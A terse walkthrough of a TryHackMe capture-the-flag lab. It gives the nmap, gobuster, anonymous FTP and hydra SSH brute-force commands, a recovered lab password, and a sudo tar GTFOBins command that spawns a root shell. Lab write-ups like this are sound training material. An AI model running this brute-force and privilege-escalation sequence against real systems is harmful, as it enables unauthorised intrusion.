Bounty Hunter

Room Link: https://tryhackme.com/room/cowboyhacker

Scanning

nmap -A $VICTIM

No other ports found.

nmap -p- $VICTIM

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

anonymous login works

Kali

ftp $VICTIM
Username: anonymous

Kali

hydra -l lin -P locks.txt ssh://$VICTIM

Username: lin
Password: RedDr4gonSynd1cat3

Kali

ssh lin@$VICTIM

Exploit Link: https://gtfobins.github.io/gtfobins/tar/

Victim

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Last updated 1 year ago